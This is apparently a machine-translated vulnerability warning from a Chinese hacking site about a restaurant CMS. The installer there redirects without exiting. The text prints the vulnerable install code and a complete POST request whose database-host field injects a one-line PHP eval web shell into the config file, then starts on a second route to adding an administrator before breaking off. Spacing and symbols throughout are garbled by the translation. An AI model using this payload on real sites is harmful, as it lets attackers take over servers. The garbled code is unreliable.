Treat technology restaurant cms vulnerability(getshell)-vulnerability warning-the black bar safety net

2012-12-01T00:00:00
ID MYHACK58:62201235866
Type myhack58
Reporter 佚名
Modified 2012-12-01T00:00:00

Description

The problem is in the/install/index. php file. In the program after the installation, will be in the program root directory generated under the install. lock file. And the/install/index. php in to determine whether there is install. lock when an error occurs.

<? php if(file_exists("../install. lock")) { header("Location: ../");//no exit }

//echo 'tst';exit; require_once("init.php"); if(empty($_REQUEST['step']) || $_REQUEST['step']==1) { Visible in the/install/index. php there, just header done 3 0 2 redirect and not exit, that is the following logic will still be executed. Here can at least produce two vulnerabilities.

1, The getshell very dangerous if(empty($_REQUEST['step']) || $_REQUEST['step']==1) { $smarty->assign("step",1); $smarty->display("index.html"); }elseif($_REQUEST['step']==2) { $mysql_host=trim($_POST['mysql_host']); $mysql_user=trim($_POST['mysql_user']); $mysql_pwd=trim($_POST['mysql_pwd']); $mysql_db=trim($_POST['mysql_db']); $tblpre=trim($_POST['tblpre']); $domain==trim($_POST['domain']); $str="<? php \r\n"; $str.=' define("MYSQL_HOST","'.$ mysql_host.'");'."\ r\n"; $str.=' define("MYSQL_USER","'.$ mysql_user.'");'."\ r\n"; $str.=' define("MYSQL_PWD","'.$ mysql_pwd.'");'."\ r\n"; $str.=' define("MYSQL_DB","'.$ mysql_db.'");'."\ r\n"; $str.=' define("MYSQL_CHARSET","GBK");'."\ r\n"; $str.=' define("TABLE_PRE","'.$ tblpre.'");'."\ r\n"; $str.=' define("DOMAIN","'.$ domain.'");'."\ r\n"; $str.=' define("SKINS","default");'."\ r\n"; $str.='?& gt;'; file_put_contents("../config/config.inc.php",$str);//the submitted data is written to a php file The above code will POST the data directly written into the../config/config. inc. php file, then we submit the following POST package, you can get the word Trojan POST /canting/install/index. php? m=index&step=2 HTTP/1.1 Host: 192.168.80.129 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: EN-us,EN;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.80.129/canting/install/index.php?step=1 Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42 Content-Type: application/x-www-form-urlencoded Content-Length: 1 2 6

mysql_host=test");@eval($POST[x]);?& gt;//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu&domain=www&button=%CF%C2%D2%BB%B2%BD But this method is very dangerous, and will cause the website is not running.

2, directly add administrator

elseif($_REQUEST['step']==5) { if($_POST) { require_once("../config/config.inc.php"); $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD); mysql_select_db(MYSQL_DB,$link); mysql_query("SET NAMES ". MYSQL_CHARSET ); mysql_query("SET sql_mode="");

$adminname=trim($_POST['adminname']); $pwd1=trim($_POST['pwd1']); $pwd2=trim($_POST['pwd2']); if(empty($adminname)) {

[1] [2] next